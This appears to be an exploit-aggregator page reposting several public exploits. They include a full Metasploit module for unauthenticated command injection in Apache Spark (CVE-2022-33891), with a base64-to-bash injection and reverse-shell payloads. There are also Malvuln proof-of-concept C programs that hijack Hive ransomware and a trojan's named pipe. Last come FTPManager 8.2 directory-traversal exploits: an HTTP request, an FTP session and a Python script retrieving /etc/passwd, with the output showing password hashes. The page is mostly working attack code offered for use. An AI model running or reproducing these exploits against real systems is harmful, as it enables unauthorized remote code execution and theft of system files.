Latest exploits :: CodePwn

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'rex/stopwatch' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Apache Spark Unauthenticated Command Injection RCE', 'Description' => %q{ This module exploits an unauthenticated command injection vulnerability in Apache Spark. Successful exploitation results in remote code execution under the context of the Spark application user. The command injection occurs because Spark checks the group membership of the user passed in the ?doAs parameter by using a raw Linux command. It is triggered by a non-default setting called spark.acls.enable. This configuration setting spark.acls.enable should be set true in the Spark configuration to make the application vulnerable for this attack. Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1 are affected by this vulnerability. }, 'License' => MSF_LICENSE, 'Author' => [ 'Kostya Kortchinsky', # Security researcher and discovery of the vulnerability 'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Author & Metasploit module ], 'References' => [ ['URL', 'https://lists.apache.org/thread/p847l3kopoo5bjtmxrcwk21xp6tjxqlc'], # Disclosure ['URL', 'https://attackerkb.com/topics/5FyKBES4BL/cve-2022-33891'], # Analysis ['CVE', '2022-33891'] ], 'DefaultOptions' => { 'SSL' => false, 'WfsDelay' => 5 }, 'Platform' => %w[unix linux], 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], 'Targets' => [ [ 'Unix (In-Memory)', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :in_memory, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_python' } } ], [ 'Linux Dropper', { 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :dropper, 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' } } ] ], 'CmdStagerFlavor' => ['printf', 'curl'], 'DefaultTarget' => 0, 'Privileged' => false, 'DisclosureDate' => '2022-07-18', 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS] } ) ) register_options( [ Opt::RPORT(8080), OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/']) ] ) end def execute_command(cmd, _opts = {}) b64 = Rex::Text.encode_base64(cmd) post_data = "doAs=\`echo #{b64} | base64 -d | bash\`" return send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/'), 'data' => post_data }) rescue Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, Errno::ETIMEDOUT => e elog("A communication error occurred: #{e.message}", error: e) end def check print_status("Checking if #{peer} can be exploited!") res = execute_command("echo #{Rex::Text.rand_text_alpha_lower(8..12)}") return CheckCode::Unknown('Did not receive a response from target.') unless res if res.code != 403 return CheckCode::Safe('Target did not respond with a 403 response.') end sleep_time = rand(5..10) print_status("Performing command injection test issuing a sleep command of #{sleep_time} seconds.") res, elapsed_time = Rex::Stopwatch.elapsed_time do execute_command("sleep #{sleep_time}") end print_status("Elapsed time: #{elapsed_time} seconds.") unless res && elapsed_time >= sleep_time return CheckCode::Safe('Failed to test command injection.') end CheckCode::Vulnerable('Successfully tested command injection.') end def exploit print_status('Exploiting...') case target['Type'] when :in_memory execute_command(payload.encoded) when :dropper execute_cmdstager(linemax: 1024) # set an appropriate :linemax dependent upon available space end end end </code></pre>

<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022 Original source: https://malvuln.com/advisory/44aba241dd3f0d156c6ed82a0ab3a9e1.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Trojan-Ransom.Win32.Hive.bv Vulnerability: Arbitrary Code Execution Description: Hive Ransomware will load and execute arbitrary .EXE PE files if a third-party adversary or defender uses the vulnerable naming convention of "vssadmin.exe" or "wmic.exe" and the PE file is placed in the vacinity of Hive Ransomware when it is executed. Family: Hive Type: PE64 MD5: 44aba241dd3f0d156c6ed82a0ab3a9e1 Vuln ID: MVID-2022-0636 Disclosure: 09/06/2022 Exploit/PoC: 1) Compile to "vssadmin.exe" 2) Supplying Hive CL credentials e.g. -u <login>:<password> "vssadmin.c" #include "windows.h" #include "tlhelp32.h" #include "psapi.h" //Compiled x64 //By Malvuln - 2022 //Purpose: RCE PWN Hive Ransomware //MD5: 44aba241dd3f0d156c6ed82a0ab3a9e1 /** DISCLAIMER: Author is NOT responsible for any damages whatsoever by using this software or improper malware handling. By using this code you assume and accept all risk implied or otherwise. **/ DWORD getParentPID(DWORD pid){ HANDLE h32 = NULL; PROCESSENTRY32 pe = {0}; DWORD ppid = 0; pe.dwSize = sizeof(PROCESSENTRY32); h32 = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if(Process32First(h32, &pe)){ do{ if (pe.th32ProcessID == pid){ ppid = pe.th32ParentProcessID; break; } } while( Process32Next(h32, &pe)); } CloseHandle(h32); return (ppid); } int main(void){ DWORD ppid = getParentPID(GetCurrentProcessId()); HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE, ppid); if (NULL != handle) { TerminateProcess(handle, 0); CloseHandle(handle); MessageBox(NULL, "Not the vssadmin.exe you wanted :(\nHive Ransomware PWNED!\n\nBy Malvuln", "Code Execution PoC\n", MB_OK); } return 0; } Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022 Original source: https://malvuln.com/advisory/d871836f77076eeed87eb0078c1911c7_B.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Trojan.Win32.Autoit.fhj Vulnerability: Named Pipe Null DACL Family: Autoit Type: PE32 MD5: d871836f77076eeed87eb0078c1911c7 Vuln ID: MVID-2022-0638 Disclosure: 09/06/2022 Description: The malware creates two processes "xservice.exe" and a child process "xps.exe". The process creates an IPC pipe with a NULL DACL allowing RW for the Everyone user group. RManFUSCallbackNotify32 RManFUSServerNotify32 \\.\Pipe\RManFUSCallbackNotify32 RW Everyone Local low privileged users can modify the DACL to remove rights for the Everyone users group, denying access to use the pipe for further RW interprocess communications. Exploit/PoC: #include "windows.h" #include "stdio.h" #include "accctrl.h" #include "aclapi.h" /* Trojan.Win32.Autoit.fhj.d871836f77076eeed87eb0078c1911c7 NamedPipe Exploit Deny Access to Everyone By Malvuln **/ #define VULN_TROJAN_PIPE "\\\\.\\pipe\\RManFUSCallbackNotify32" int main(void){ HANDLE hPipe = CreateFileA((LPCSTR)VULN_TROJAN_PIPE, GENERIC_WRITE | WRITE_DAC, 0, NULL, OPEN_EXISTING, NULL, NULL); PACL pOldDACL = NULL; PACL pNewDACL = NULL; if (hPipe == INVALID_HANDLE_VALUE){ printf("%d", GetLastError()); return 1; } if(GetSecurityInfo(hPipe, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, &pOldDACL, NULL, NULL) != ERROR_SUCCESS){ printf("%d", GetLastError()); return 1; } TRUSTEE trustee[1]; trustee[0].TrusteeForm = TRUSTEE_IS_NAME; trustee[0].TrusteeType = TRUSTEE_IS_GROUP; trustee[0].ptstrName = TEXT("Everyone"); trustee[0].MultipleTrusteeOperation = NO_MULTIPLE_TRUSTEE; trustee[0].pMultipleTrustee = NULL; EXPLICIT_ACCESS explicit_access_list[1]; ZeroMemory(&explicit_access_list[0], sizeof(EXPLICIT_ACCESS)); explicit_access_list[0].grfAccessMode = DENY_ACCESS; explicit_access_list[0].grfAccessPermissions = GENERIC_ALL; explicit_access_list[0].grfInheritance = NO_INHERITANCE; explicit_access_list[0].Trustee = trustee[0]; if(SetEntriesInAcl(1, explicit_access_list, pOldDACL, &pNewDACL) != ERROR_SUCCESS){ printf("%d", GetLastError()); return 1; } if(SetSecurityInfo(hPipe, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDACL, NULL) != ERROR_SUCCESS){ printf("%d", GetLastError()); return 1; }else{ printf("Trojan.Win32.Autoit.fhj PWNED!\n"); printf("By Malvuln\n"); } LocalFree(pNewDACL); LocalFree(pOldDACL); CloseHandle(hPipe); system("pause"); return 0; } Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code># Exploit Title: FTPManager 8.2 Local File inclusion # Date: Sep 6, 2022 # Exploit Author: Chokri Hammedi # Vendor Homepage: https://www.skyjos.com/ # Software Link: https://apps.apple.com/us/app/ftpmanager-ftp-sftp-client/id525959186 # Version: 8.2 # Tested on: Ios 15.6 GET /../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 Host: 192.168.1.178:8080 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close ------------------ HTTP/1.1 200 OK Connection: Close Server: GCDWebUploader Content-Type: application/octet-stream Last-Modified: Wed, 13 Jul 2022 10:35:46 GMT Date: Tue, 06 Sep 2022 03:05:05 GMT Content-Length: 2581 Cache-Control: max-age=3600, public Etag: 1152921500312311384/1657708546/0 ## # User Database # # This file is the authoritative user database. ## nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false root:/smx7MYTQIi2M:0:0:System Administrator:/var/root:/bin/sh mobile:/smx7MYTQIi2M:501:501:Mobile User:/var/mobile:/bin/sh daemon:*:1:1:System Services:/var/root:/usr/bin/false _ftp:*:98:-2:FTP Daemon:/var/empty:/usr/bin/false _networkd:*:24:24:Network Services:/var/networkd:/usr/bin/false _wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false _installd:*:33:33:Install Daemon:/var/installd:/usr/bin/false _neagent:*:34:34:NEAgent:/var/empty:/usr/bin/false _ifccd:*:35:35:ifccd:/var/empty:/usr/bin/false _securityd:*:64:64:securityd:/var/empty:/usr/bin/false _mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false _sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false _unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false _usbmuxd:*:213:213:iPhone OS Device Helper:/var/db/lockdown:/usr/bin/false _distnote:*:241:241:Distributed Notifications:/var/empty:/usr/bin/false _astris:*:245:245:Astris Services:/var/db/astris:/usr/bin/false _ondemand:*:249:249:On Demand Resource Daemon:/var/db/ondemand:/usr/bin/false _findmydevice:*:254:254:Find My Device Daemon:/var/db/findmydevice:/usr/bin/false _datadetectors:*:257:257:DataDetectors:/var/db/datadetectors:/usr/bin/false _captiveagent:*:258:258:captiveagent:/var/empty:/usr/bin/false _analyticsd:*:263:263:Analytics Daemon:/var/db/analyticsd:/usr/bin/false _timed:*:266:266:Time Sync Daemon:/var/db/timed:/usr/bin/false _gpsd:*:267:267:GPS Daemon:/var/db/gpsd:/usr/bin/false _reportmemoryexception:*:269:269:ReportMemoryException:/var/empty:/usr/bin/false _driverkit:*:270:270:DriverKit:/var/empty:/usr/bin/false _diskimagesiod:*:271:271:DiskImages IO Daemon:/var/db/diskimagesiod:/usr/bin/false _logd:*:272:272:Log Daemon:/var/db/diagnostics:/usr/bin/false _iconservices:*:276:276:Icon services:/var/empty:/usr/bin/false _rmd:*:277:277:Remote Management Daemon:/var/db/rmd:/usr/bin/false _accessoryupdater:*:278:278:Accessory Update Daemon:/var/db/accessoryupdater:/usr/bin/false _knowledgegraphd:*:279:279:Knowledge Graph Daemon:/var/db/knowledgegraphd:/usr/bin/false _coreml:*:280:280:CoreML Services:/var/empty:/usr/bin/false _sntpd:*:281:281:SNTP Server Daemon:/var/empty:/usr/bin/false _trustd:*:282:282:trustd:/var/empty:/usr/bin/false _mmaintenanced:*:283:283:mmaintenanced:/var/db/mmaintenanced:/usr/bin/false _darwindaemon:*:284:284:Darwin Daemon:/var/db/darwindaemon:/usr/bin/false _notification_proxy:*:285:285:Notification Proxy:/var/empty:/usr/bin/false --------------------------------------------------- # Exploit Title: FTPManager 8.2 Directory Traversal (ftp) # Date: Sep 6, 2022 # Exploit Author: Chokri Hammedi # Vendor Homepage: https://www.skyjos.com/ # Software Link: https://apps.apple.com/us/app/ftpmanager-ftp-sftp-client/id525959186 # Version: 8.2 # Tested on: ios 15.6 #ftp 192.168.1.178 2121 Connected to 192.168.1.178. 220 ---------- Welcome to FTPManager ---------- Name (192.168.1.178:chokri): 230 User chokri logged in. Remote system type is UNIX. Using binary mode to transfer files. ftp> cd /../../../../../../../../../../../../../../../../ 250 OK. Current directory is /../../../../../../../../../../../../../../../../ ftp> ls 200 PORT command successful. 150 Accepted data connection total 10 drwxr-xr-x 0 root wheel 256 Jan 01 1970 usr drwxr-xr-x 0 root wheel 128 Jan 01 1970 bin drwxr-xr-x 0 root wheel 576 Jan 01 1970 sbin drwxr-xr-x 0 root wheel 160 Jan 01 1970 System drwxr-xr-x 0 root wheel 672 Jan 01 1970 Library drwxr-xr-x 0 root wheel 224 Jan 01 1970 private drwxr-xr-x 0 root wheel 1132 Jan 01 1970 dev drwxr-xr-x 0 root admin 3968 Jan 01 1970 Applications drwxr-xr-x 0 root admin 64 Jan 01 1970 Developer drwxr-xr-x 0 root admin 64 Jan 01 1970 cores WARNING! 10 bare linefeeds received in ASCII mode File may not have transferred correctly. 226 Transfer complete. ftp> cd private/etc 250 OK. Current directory is /../../../../../../../../../../../../../../../../private/etc ftp> get passwd local: passwd remote: passwd 200 PORT command successful. 150 Opening BINARY mode data connection for 'passwd'. 226 Transfer complete. 2581 bytes received in 0.00 secs (11.5020 MB/s) ftp> get services local: services remote: services 200 PORT command successful. 150 Opening BINARY mode data connection for 'services'. 226 Transfer complete. 677977 bytes received in 0.17 secs (3.8257 MB/s) --------------------------------------------------- # Exploit Title: FTPManager 8.2 Local File inclusion (ftp) python # Date: Sep 6, 2022 # Exploit Author: Chokri Hammedi # Vendor Homepage: https://www.skyjos.com/ # Software Link: https://apps.apple.com/us/app/ftpmanager-ftp-sftp-client/id525959186 # Version: 8.2 # Tested on: ios 15.6 from ftplib import FTP import argparse help = " FTPManager 8.2 Local File inclusion by chokri hammedi" parser = argparse.ArgumentParser(description=help) parser.add_argument("--target", help="Target IP", required=True) parser.add_argument("--file", help="File To Open eg: etc/passwd") args = parser.parse_args() ip = args.target port = 2121 # Default Port files = args.file ftpConnection = FTP() ftpConnection.connect(host=ip, port=port) ftpConnection.login(); def downloadFile(): ftpConnection.cwd('/../../../../../../../../../../../../../../../../') ftpConnection.retrbinary(f"RETR {files}", open('data.txt', 'wb').write) ftpConnection.close() file = open('data.txt', 'r') print (f"[***] The contents of {files}\n") print (file.read()) downloadFile() </code></pre>

<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022 Original source: https://malvuln.com/advisory/d871836f77076eeed87eb0078c1911c7.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Trojan.Win32.Autoit.fhj Vulnerability: Insecure Permissions Description: The malware writes two hidden DLL files "vp8decoder.dll" and "vp8encoder.dll" to its installation directory granting full (F) permissions to the Everyone user group. Any user can replace the PE files dropped by the malware to disable it or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges. Family: Autoit Type: PE32 MD5: d871836f77076eeed87eb0078c1911c7 Vuln ID: MVID-2022-0637 Disclosure: 09/06/2022 Exploit/PoC: insecure dir permissions for two DLL's with bunch hidden files C:\Program Files (x86)\XPS Rasterization Service Component>attrib -s -h * C:\Program Files (x86)\XPS Rasterization Service Component>cacls * C:\Program Files (x86)\XPS Rasterization Service Component\vp8decoder.dll Everyone:F C:\Program Files (x86)\XPS Rasterization Service Component\vp8encoder.dll Everyone:F Directory of C:\Program Files (x86)\XPS Rasterization Service Component 09/05/2022 12:18 AM 1,165 Log(05.09.2022).txt 09/05/2022 12:15 AM 803,971 Screen(00_15).jpg 02/21/2017 02:58 PM 2,665 settings.dat 07/15/2015 12:19 PM 143,568 vp8decoder.dll 07/15/2015 12:19 PM 539,856 vp8encoder.dll 09/05/2022 12:15 AM 2,052,816 xps.exe 02/21/2017 01:24 PM 2,031,104 xservice.exe 7 File(s) 5,575,145 bytes Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>